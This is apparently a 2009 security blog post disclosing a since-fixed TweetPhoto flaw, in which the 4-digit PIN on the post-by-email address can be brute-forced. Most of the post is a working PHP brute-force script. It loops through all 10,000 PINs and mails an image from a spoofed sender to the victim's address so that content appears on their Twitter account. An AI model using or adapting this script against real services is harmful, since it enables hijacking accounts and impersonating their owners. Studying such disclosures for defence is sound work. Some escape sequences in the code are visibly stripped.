Computersight -

For those of you that read my “About Me”, I mentioned that I am a “Greyhat” Well- most of my post will be about website exploits and ect. For those who are interested in “WebBase Security”, then keep updated on a lot of my post.

In my latest findings, we are back at a problem that was once revolved around Twitpic. Some time at the end of June, “hackers” were capable of posting from celebrity accounts (Britney Spears). I wouldn’t consider this a real security risk, such as confiscation of user’s passwords or any other personal information. Though this would allow an attacker to promote a special image or send a message of his through any user’s Twitter.

The vulnerability lies between the email update within TweetPhoto. The maximum amount combination for the PIN is for numbers, this allows the PIN combination to be easily defeated and figured out by simply emailing at least 9999 emails to “User.1-9999@tweetphoto.com”.  There are a few celebrities I have seen using TweetPhoto, which would make this quite effective and very simple to achieve.

Here is a proof of concept, coded in PHP:

===========================================================

for($pin = 0; $pin <= 9999; $pin++){	if(strlen($pin) != 4){		if(strlen($pin) == 1){			$pin = "000$pin";		}		if(strlen($pin) == 2){			$pin = "00$pin";		}		if(strlen($pin) == 3){			$pin = "0$pin";		}	}	$image = "IMAGEE.jpg";	$from = "fixthis@tweetphoto.com";	$victim = "victim";	$to = $victim.".".$pin."@tweetphoto.com";	$subject = 'tweetphoto vulnerability';	$message = "tweetphoto vulnerability - http://mikeyy-security.com";	if(mail_attachment($image, $to, $from, $subject, $message))		echo "Trying ".$to."n";}

function mail_attachment($filename, $mailto, $mailfrom, $subject, $message) {    $file = $filename;    $file_size = filesize($file);	$image_type = image_type_to_mime_type(exif_imagetype($file));    $handle = fopen($file, "r");    $content = fread($handle, $file_size);    fclose($handle);    $content = chunk_split(base64_encode($content));    $uid = md5(uniqid(time()));    $name = basename($file);    $header = "From: ".$mailfrom."rn";    $header .= "MIME-Version: 1.0rn";    $header .= "Content-Type: multipart/mixed; boundary="".$uid.""rnrn";    $header .= "This is a multi-part message in MIME format.rn";    $header .= "--".$uid."rn";    $header .= "Content-type:text/plain; charset=iso-8859-1rn";    $header .= "Content-Transfer-Encoding: 7bitrnrn";    $header .= $message."rnrn";    $header .= "--".$uid."rn";    $header .= "Content-Type: ".$image_type."; name="".$filename.""rn";    $header .= "Content-Transfer-Encoding: base64rn";    $header .= "Content-Disposition: attachment; filename="".$filename.""rnrn";    $header .= $content."rnrn";    $header .= "--".$uid."--";    if (mail($mailto, $subject, "", $header)) {        return true;    } else {        return false;    }

}

===========================================================

-I am in no way exploiting twitpic.com, this is just a post with the vulnerability “Which is now fixed”

===========================================================

-www.mikeyy-security.com

Visit my site and read about more of my finds.

• Copyright ©  2009  Mikeyy Security